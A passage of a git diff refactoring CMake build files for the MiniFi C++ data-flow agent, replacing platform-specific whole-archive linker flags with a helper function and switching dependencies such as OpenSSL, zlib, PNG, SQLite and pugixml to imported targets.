-			target_link_libraries (${testfilename} -Wl,--whole-archive ${LIBSSH2_LIBRARY} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES}  minifi-expression-language-extensions minifi-sftp minifi-standard-processors sftp-test-tools -Wl,--no-whole-archive)
-		endif ()
-
 		createTests("${testfilename}")
-		target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
+		target_link_libraries(${testfilename} ${CATCH_MAIN_LIB} minifi sftp-test-tools)
+		target_wholearchive_library(${testfilename} minifi-sftp)
+		target_wholearchive_library(${testfilename} minifi-expression-language-extensions)
+		target_wholearchive_library(${testfilename} minifi-standard-processors)
+
 		MATH(EXPR SFTP-EXTENSIONS_TEST_COUNT "${SFTP-EXTENSIONS_TEST_COUNT}+1")
 		add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 	ENDFOREACH()
diff --git a/extensions/sftp/tests/tools/CMakeLists.txt b/extensions/sftp/tests/tools/CMakeLists.txt
index da76eb9..c42fe0d 100644
--- a/extensions/sftp/tests/tools/CMakeLists.txt
+++ b/extensions/sftp/tests/tools/CMakeLists.txt
@@ -21,21 +21,13 @@
 
 add_library(sftp-test-tools STATIC ${SOURCES})
 
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/catch")
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/cron")
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include")
-target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-0.5.3/include")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/include")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/core")
 target_include_directories(sftp-test-tools BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/io")
 
-if (APPLE)
-    target_link_libraries (sftp-test-tools -Wl,-all_load minifi-sftp minifi-standard-processors)
-else ()
-    target_link_libraries (sftp-test-tools -Wl,--whole-archive minifi-sftp minifi-standard-processors -Wl,--no-whole-archive)
-endif ()
+target_link_libraries(sftp-test-tools minifi)
 
 set(SFTP_TEST_SERVER_JAR_SOURCE "${CMAKE_SOURCE_DIR}/extensions/sftp/tests/tools/sftp-test-server")
 set(SFTP_TEST_SERVER_JAR_BIN "${CMAKE_CURRENT_BINARY_DIR}/" )
diff --git a/extensions/sqlite/CMakeLists.txt b/extensions/sqlite/CMakeLists.txt
index 3bef06f..b97a38f 100644
--- a/extensions/sqlite/CMakeLists.txt
+++ b/extensions/sqlite/CMakeLists.txt
@@ -19,8 +19,6 @@
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt) 
 
-include_directories("${CMAKE_SOURCE_DIR}/thirdparty/sqlite")
-
 file(GLOB SOURCES "*.cpp")
 
 add_library(minifi-sqlite-extensions STATIC ${SOURCES})
@@ -32,22 +30,8 @@
   target_link_libraries(minifi-sqlite-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-sqlite-extensions ${CMAKE_DL_LIBS})
-target_link_libraries(minifi-sqlite-extensions sqlite)
-
-if (WIN32)
-    set_target_properties(minifi-sqlite-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-sqlite-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-sqlite-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-sqlite-extensions ${LIBMINIFI})
+target_link_libraries(minifi-sqlite-extensions SQLite::SQLite3)
 
 
 SET (SQLITE-EXTENSIONS minifi-sqlite-extensions PARENT_SCOPE)
diff --git a/extensions/standard-processors/CMakeLists.txt b/extensions/standard-processors/CMakeLists.txt
index ddaf19f..c96d6ca 100644
--- a/extensions/standard-processors/CMakeLists.txt
+++ b/extensions/standard-processors/CMakeLists.txt
@@ -31,7 +31,7 @@
   target_link_libraries(minifi-standard-processors "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-standard-processors core-minifi)
+target_link_libraries(minifi-standard-processors ${LIBMINIFI})
 
 SET (STANDARD-PROCESSORS minifi-standard-processors PARENT_SCOPE)
 register_extension(minifi-standard-processors)
diff --git a/extensions/standard-processors/tests/CMakeLists.txt b/extensions/standard-processors/tests/CMakeLists.txt
index 0d525c2..8021279 100644
--- a/extensions/standard-processors/tests/CMakeLists.txt
+++ b/extensions/standard-processors/tests/CMakeLists.txt
@@ -20,34 +20,27 @@
 
 file(GLOB PROCESSOR_UNIT_TESTS  "unit/*.cpp")
 file(GLOB PROCESSOR_INTEGRATION_TESTS "integration/*.cpp")
-if (NOT OPENSSL_FOUND)
+if(OPENSSL_OFF)
 	list(REMOVE_ITEM PROCESSOR_INTEGRATION_TESTS "${CMAKE_CURRENT_SOURCE_DIR}/integration/SecureSocketGetTCPTest.cpp")
 endif()
 
 SET(PROCESSOR_INT_TEST_COUNT 0)
 
-find_package(OpenSSL REQUIRED)
 FOREACH(testfile ${PROCESSOR_UNIT_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} BEFORE PRIVATE ${PROCESSOR_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
     createTests("${testfilename}")
     target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-    if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions)
-	elseif(WIN32)
-		target_link_libraries(${testfilename} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi minifi-standard-processors minifi-civet-extensions)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi /WHOLEARCHIVE:minifi-standard-processors /WHOLEARCHIVE:minifi-civet-extensions")
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions -Wl,--no-whole-archive)
-  	endif()
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
   	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR})
-  MATH(EXPR PROCESSOR_INT_TEST_COUNT "${PROCESSOR_INT_TEST_COUNT}+1")
+
+	MATH(EXPR PROCESSOR_INT_TEST_COUNT "${PROCESSOR_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${PROCESSOR_INT_TEST_COUNT} processor unit test file(s)...")
@@ -58,32 +51,27 @@
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} BEFORE PRIVATE ${PROCESSOR_INCLUDE_DIRS})
-	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
- 	 createTests("${testfilename}")
- 	 if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions)
-	elseif(WIN32)
-		target_link_libraries(${testfilename} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi minifi-standard-processors minifi-civet-extensions)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi /WHOLEARCHIVE:minifi-standard-processors /WHOLEARCHIVE:minifi-civet-extensions")
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions -Wl,--no-whole-archive)
-  	endif()
- 	 MATH(EXPR INT_TEST_COUNT "${INT_TEST_COUNT}+1")
+ 	createTests("${testfilename}")
+	target_link_libraries(${testfilename})
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+
+	MATH(EXPR INT_TEST_COUNT "${INT_TEST_COUNT}+1")
 ENDFOREACH()
 message("-- Finished building ${INT_TEST_COUNT} integration test file(s)...")
 
 
 add_test(NAME TestExecuteProcess COMMAND TestExecuteProcess )
 
-if (OPENSSL_FOUND)
-add_test(NAME SecureSocketGetTCPTest COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecure.yml"  "${TEST_RESOURCES}/")
-add_test(NAME SecureSocketGetTCPTestEmptyPass COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureEmptyPass.yml"  "${TEST_RESOURCES}/")
-add_test(NAME SecureSocketGetTCPTestWithPassword COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithPass.yml"  "${TEST_RESOURCES}/")
-add_test(NAME SecureSocketGetTCPTestWithPasswordFile COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithFilePass.yml"  "${TEST_RESOURCES}/")
+if(NOT OPENSSL_OFF)
+	add_test(NAME SecureSocketGetTCPTest COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecure.yml"  "${TEST_RESOURCES}/")
+	add_test(NAME SecureSocketGetTCPTestEmptyPass COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureEmptyPass.yml"  "${TEST_RESOURCES}/")
+	add_test(NAME SecureSocketGetTCPTestWithPassword COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithPass.yml"  "${TEST_RESOURCES}/")
+	add_test(NAME SecureSocketGetTCPTestWithPasswordFile COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithFilePass.yml"  "${TEST_RESOURCES}/")
 endif()
 
 add_test(NAME TailFileTest COMMAND TailFileTest "${TEST_RESOURCES}/TestTailFile.yml"  "${TEST_RESOURCES}/")
diff --git a/extensions/tensorflow/CMakeLists.txt b/extensions/tensorflow/CMakeLists.txt
index a641a18..a308756 100644
--- a/extensions/tensorflow/CMakeLists.txt
+++ b/extensions/tensorflow/CMakeLists.txt
@@ -39,6 +39,7 @@
   target_link_libraries(minifi-tensorflow-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
+target_link_libraries(minifi-tensorflow-extensions ${LIBMINIFI})
 target_link_libraries(minifi-tensorflow-extensions ${TENSORFLOW_LIBRARIES})
 
 SET (TENSORFLOW-EXTENSIONS minifi-tensorflow-extensions PARENT_SCOPE)
diff --git a/extensions/usb-camera/CMakeLists.txt b/extensions/usb-camera/CMakeLists.txt
index cfe1258..ef7e0b9 100644
--- a/extensions/usb-camera/CMakeLists.txt
+++ b/extensions/usb-camera/CMakeLists.txt
@@ -19,10 +19,7 @@
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 
-find_package(PkgConfig)
-pkg_check_modules(LIBUSB libusb-1.0)
-
-find_package(png QUIET)
+find_package(PNG)
 if(PNG_FOUND)
     set(PNG_LINK_FLAGS ${PNG_LIBRARIES})
 else()
@@ -43,8 +40,12 @@
     message(FATAL_ERROR "A compatible PNG library is required to build GetUSBCamera.")
 endif()
 
-
-include_directories(../../thirdparty/libuvc-0.0.6/include)
+if(NOT TARGET PNG::PNG)
+    add_library(PNG::PNG UNKNOWN IMPORTED)
+    set_target_properties(PNG::PNG PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${PNG_INCLUDE_DIR}"
+            INTERFACE_LINK_LIBRARIES ${PNG_LINK_FLAGS})
+endif()
 
 file(GLOB SOURCES  "*.cpp")
 
@@ -58,31 +59,8 @@
 endif()
 
 target_link_libraries(minifi-usb-camera-extensions ${LIBMINIFI})
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-usb-camera-extensions ${CMAKE_DL_LIBS} )
-target_link_libraries(minifi-usb-camera-extensions ${PNG_LINK_FLAGS})
-target_link_libraries(minifi-usb-camera-extensions uvc_static )
-target_link_libraries(minifi-usb-camera-extensions ${LIBUSB_LIBRARIES})
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-usb-camera-extensions ${ZLIB_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-usb-camera-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-usb-camera-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-usb-camera-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
+target_link_libraries(minifi-usb-camera-extensions libuvc PNG::PNG)
 
 SET (USB-CAMERA-EXTENSIONS minifi-usb-camera-extensions PARENT_SCOPE)
 
 register_extension(minifi-usb-camera-extensions)
-
diff --git a/extensions/windows-event-log/CMakeLists.txt b/extensions/windows-event-log/CMakeLists.txt
index 584820f..5241126 100644
--- a/extensions/windows-event-log/CMakeLists.txt
+++ b/extensions/windows-event-log/CMakeLists.txt
@@ -30,44 +30,9 @@
   target_link_libraries(minifi-wel "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-set(PUGI_BYPRODUCT_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/pugixml-install" CACHE STRING "PugiXML install directory")
-set(BYPRODUCT "${PUGI_BYPRODUCT_DIR}/lib/pugixml.lib")
-  ExternalProject_Add(
-    pugixml-external
-    GIT_REPOSITORY "https://github.com/zeux/pugixml.git"
-    GIT_TAG "v1.9" 
-    SOURCE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/pugixml-src"
-    CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-			   "-DBUILD_TESTS=OFF"
-			   "-DBUILD_SHARED_AND_STATIC_LIBS=OFF"
-			   "-DBUILD_SHARED_LIBS=OFF"
-               "-DCMAKE_INSTALL_PREFIX=${PUGI_BYPRODUCT_DIR}"
-    BUILD_BYPRODUCTS ${BYPRODUCT}
-  )
+target_link_libraries(minifi-wel ${LIBMINIFI})
+target_link_libraries(minifi-wel PUGI::libpugixml ZLIB::ZLIB Wevtapi.lib)
 
-include_directories("${PUGI_BYPRODUCT_DIR}/include")
-add_dependencies(minifi-wel pugixml-external)
-target_link_libraries(minifi-wel ${LIBMINIFI} ${BYPRODUCT})
-
-target_link_libraries(minifi-wel ${CMAKE_DL_LIBS} )
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-wel ${ZLIB_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-wel PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-wel PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-wel PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
-
-SET (WEL-EXTENSION minifi-wel PARENT_SCOPE)
+SET(WEL-EXTENSION minifi-wel PARENT_SCOPE)
 
 register_extension(minifi-wel)
diff --git a/extensions/windows-event-log/tests/CMakeLists.txt b/extensions/windows-event-log/tests/CMakeLists.txt
index 7f798f1..a0f56b1 100644
--- a/extensions/windows-event-log/tests/CMakeLists.txt
+++ b/extensions/windows-event-log/tests/CMakeLists.txt
@@ -22,20 +22,14 @@
 FOREACH(testfile ${WEL_INTEGRATION_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/windows-event-log/")
+  	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/windows-event-log/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
-	target_include_directories(${testfilename} BEFORE PRIVATE "${PUGI_BYPRODUCT_DIR}/include/")
-	createTests("${testfilename}")	
-	target_link_libraries(${testfilename} ${LIBMINIFI}  ${CATCH_MAIN_LIB})
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-wel)
-	elseif(WIN32)
-		target_link_libraries (${testfilename}	minifi-wel)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-wel")
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-wel -Wl,--no-whole-archive)
-	endif ()
+	createTests("${testfilename}")
+	target_wholearchive_library(${testfilename} minifi-wel)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+	target_link_libraries (${testfilename} minifi ${CATCH_MAIN_LIB})
+
 	MATH(EXPR WEL_TEST_COUNT "${WEL_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR})
 ENDFOREACH()
diff --git a/libminifi/CMakeLists.txt b/libminifi/CMakeLists.txt
index 34f72dd..6c89eef 100644
--- a/libminifi/CMakeLists.txt
+++ b/libminifi/CMakeLists.txt
@@ -34,7 +34,6 @@
 if (WIN32)
 	add_definitions(-DWIN32_LEAN_AND_MEAN)
 endif()
-
 IF (IOS)
 set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fobjc-abi-version=2 -fobjc-arc -std=gnu++11 -stdlib=libc++ -isysroot ${CMAKE_OSX_SYSROOT} -DIOS")
 set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fobjc-abi-version=2 -fobjc-arc -isysroot ${CMAKE_OSX_SYSROOT} -DIOS")
@@ -75,11 +74,6 @@
 	set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wall -Wno-reorder")
 endif()
 
-include_directories(../thirdparty/spdlog-20170710/include)
-include_directories(../thirdparty/yaml-cpp-yaml-cpp-20171024/include)
-include_directories(../thirdparty/cron)
-include_directories(../thirdparty/rapidjson-1.1.0/include)
-include_directories(../thirdparty/concurrentqueue/)
 include_directories(include)
 
 
@@ -91,60 +85,31 @@
 set(SOCKET_SOURCES "src/io/posix/*.cpp")
 endif()
 
-find_package(OpenSSL)
-if (OPENSSL_FOUND)
+if (NOT OPENSSL_OFF)
 	set(TLS_SOURCES "src/io/tls/*.cpp")
-endif(OPENSSL_FOUND)
+endif()
 
 file(GLOB SOURCES  "src/utils/file/*.cpp" "src/sitetosite/*.cpp"  "src/core/logging/*.cpp"  "src/core/state/*.cpp" "src/core/state/nodes/*.cpp" "src/c2/protocols/*.cpp" "src/c2/triggers/*.cpp" "src/c2/*.cpp" "src/io/*.cpp" ${SOCKET_SOURCES} ${TLS_SOURCES} "src/core/controller/*.cpp" "src/controllers/*.cpp" "src/core/*.cpp"  "src/core/repository/*.cpp" "src/core/yaml/*.cpp" "src/core/reporting/*.cpp"  "src/provenance/*.cpp" "src/utils/*.cpp" "src/*.cpp")
 
 file(GLOB PROCESSOR_SOURCES  "src/processors/*.cpp" )
 
 
-file(GLOB SPD_SOURCES "../thirdparty/spdlog-20170710/include/spdlog/*")
-
-# Workaround the limitations of having a
-# header only library
-add_library(spdlog STATIC ${SPD_SOURCES})
 add_library(core-minifi STATIC ${SOURCES})
-target_link_libraries(core-minifi ${CMAKE_DL_LIBS} yaml-cpp)
-
-#target_link_libraries(core-minifi  PRIVATE bsdiff )
-
-
-include_directories(${ZLIB_INCLUDE_DIRS})
-
-target_link_libraries (core-minifi ${ZLIB_LIBRARIES})
-
+target_link_libraries(core-minifi ${CMAKE_DL_LIBS} yaml-cpp ZLIB::ZLIB concurrentqueue RapidJSON spdlog cron)
 if(NOT WIN32)
-	target_link_libraries (core-minifi OSSP::libuuid++)
+	target_link_libraries(core-minifi OSSP::libuuid++)
 endif()
-
-
-# Include OpenSSL
-if (OPENSSL_FOUND)
-	include_directories(${OPENSSL_INCLUDE_DIR})
-	if (WIN32)
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-			if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-			message( "Including ${OPENSSL_LIB}")
-			target_link_libraries (core-minifi ${OPENSSL_LIB})	
-			set_target_properties(core-minifi PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-			endif()
-		endforeach()
-	else()
-		target_link_libraries (core-minifi ${OPENSSL_LIBRARIES})
-	endif()
-
-endif (OPENSSL_FOUND)
+if (NOT OPENSSL_OFF)
+	target_link_libraries(core-minifi OpenSSL::SSL)
+endif()
 
 add_library(minifi STATIC ${PROCESSOR_SOURCES})
 
 
 target_link_libraries(minifi core-minifi)
 if (WIN32)
-set_target_properties(minifi PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
-set_target_properties(minifi PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi")
+	set_target_properties(minifi PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
+	set_target_properties(minifi PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi")
 endif()
 
 
@@ -152,39 +117,24 @@
 
 if (ENABLE_PYTHON AND NOT STATIC_BUILD)
 #### shared
+	add_library(core-minifi-shared SHARED ${SOURCES})
+	target_link_libraries(core-minifi-shared ${CMAKE_DL_LIBS} yaml-cpp ZLIB::ZLIB concurrentqueue RapidJSON spdlog cron)
+	if(NOT WIN32)
+		target_link_libraries(core-minifi-shared OSSP::libuuid++)
+	endif()
+	if (NOT OPENSSL_OFF)
+		target_link_libraries(core-minifi-shared OpenSSL::SSL)
+	endif()
 
-add_library(core-minifi-shared SHARED ${SOURCES})
-if (APPLE)
-	target_link_libraries(core-minifi-shared ${CMAKE_DL_LIBS} yaml-cpp)
-else()
-	target_link_libraries(core-minifi-shared ${CMAKE_DL_LIBS} yaml-cpp)
-endif()
+	add_library(minifi-shared SHARED ${PROCESSOR_SOURCES})
 
-include_directories(${ZLIB_INCLUDE_DIRS})
-
-target_link_libraries (core-minifi-shared ${ZLIB_LIBRARIES})
-
-if(NOT WIN32)
-	target_link_libraries (core-minifi-shared OSSP::libuuid++)
-endif()
-
-# Include OpenSSL
-
-if (OPENSSL_FOUND)
-	include_directories(${OPENSSL_INCLUDE_DIR})
-	target_link_libraries (core-minifi-shared ${OPENSSL_LIBRARIES})
-endif (OPENSSL_FOUND)
-
-add_library(minifi-shared SHARED ${PROCESSOR_SOURCES})
-
-target_link_libraries(minifi-shared core-minifi-shared)
-if (WIN32)
-set_target_properties(minifi-shared PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
-set_target_properties(minifi-shared PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi-shared")
-endif()
+	target_link_libraries(minifi-shared core-minifi-shared)
+	if (WIN32)
+		set_target_properties(minifi-shared PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
+		set_target_properties(minifi-shared PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi-shared")
+	endif()
 
 
-set_property(TARGET core-minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
-set_property(TARGET minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
-#endif()
+	set_property(TARGET core-minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
+	set_property(TARGET minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
 endif(ENABLE_PYTHON AND NOT STATIC_BUILD)
diff --git a/libminifi/include/controllers/SSLContextService.h b/libminifi/include/controllers/SSLContextService.h
index b56b163..ea5fef7 100644
--- a/libminifi/include/controllers/SSLContextService.h
+++ b/libminifi/include/controllers/SSLContextService.h
@@ -166,6 +166,7 @@
   std::string passphrase_file_;
   std::string ca_certificate_;
 
+#ifdef OPENSSL_SUPPORT
   static std::string getLatestOpenSSLErrorString() {
     unsigned long err = ERR_peek_last_error();
     if (err == 0U) {
@@ -175,6 +176,7 @@
     ERR_error_string_n(err, buf, sizeof(buf));
     return buf;
   }
+#endif
 
   static bool isFileTypeP12(const std::string& filename) {
     return utils::StringUtils::endsWithIgnoreCase(filename, "p12");
diff --git a/libminifi/src/controllers/SSLContextService.cpp b/libminifi/src/controllers/SSLContextService.cpp
index ee1ef2c..5af7f92 100644
--- a/libminifi/src/controllers/SSLContextService.cpp
+++ b/libminifi/src/controllers/SSLContextService.cpp
@@ -49,6 +49,7 @@
   initialized_ = true;
 }
 
+#ifdef OPENSSL_SUPPORT
 bool SSLContextService::configure_ssl_context(SSL_CTX *ctx) {
   if (!IsNullOrEmpty(certificate)) {
     if (isFileTypeP12(certificate)) {
@@ -133,6 +134,7 @@
 
   return true;
 }
+#endif
 
 /**
  * If OpenSSL is not installed we may still continue operations. Nullptr will
diff --git a/libminifi/test/archive-tests/CMakeLists.txt b/libminifi/test/archive-tests/CMakeLists.txt
index 63b76ea..76a54cc 100644
--- a/libminifi/test/archive-tests/CMakeLists.txt
+++ b/libminifi/test/archive-tests/CMakeLists.txt
@@ -26,11 +26,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/libarchive")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/libarchive-3.3.2/libarchive")
-	if (APPLE)
-	      target_link_libraries (${testfilename} ${ZLIB_LIBRARIES} -Wl,-all_load minifi-archive-extensions minifi-standard-processors)
-	else ()
-	    target_link_libraries (${testfilename} ${ZLIB_LIBRARIES} -Wl,--whole-archive minifi-archive-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-archive-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
diff --git a/libminifi/test/bustache-tests/CMakeLists.txt b/libminifi/test/bustache-tests/CMakeLists.txt
index a7c2cfa..2361072 100644
--- a/libminifi/test/bustache-tests/CMakeLists.txt
+++ b/libminifi/test/bustache-tests/CMakeLists.txt
@@ -27,11 +27,8 @@
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/bustache/include")
 
-  if (APPLE)
-    target_link_libraries (${testfilename} -Wl,-all_load minifi-bustache-extensions minifi-standard-processors)
-  else ()
-    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-bustache-extensions minifi-standard-processors -Wl,--no-whole-archive)
-  endif ()
+  target_wholearchive_library(${testfilename} minifi-bustache-extensions)
+  target_wholearchive_library(${testfilename} minifi-standard-processors)
 
   createTests("${testfilename}")
   target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
diff --git a/libminifi/test/coap-tests/CMakeLists.txt b/libminifi/test/coap-tests/CMakeLists.txt
index 4da8737..6724259 100644
--- a/libminifi/test/coap-tests/CMakeLists.txt
+++ b/libminifi/test/coap-tests/CMakeLists.txt
@@ -23,12 +23,9 @@
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/coap/")
-	createTests("${testfilename}")	
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-coap)
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-coap -Wl,--no-whole-archive)
-	endif ()
+	createTests("${testfilename}")
+	target_wholearchive_library(${testfilename} minifi-coap)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR COAP_TEST_COUNT "${COAP_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
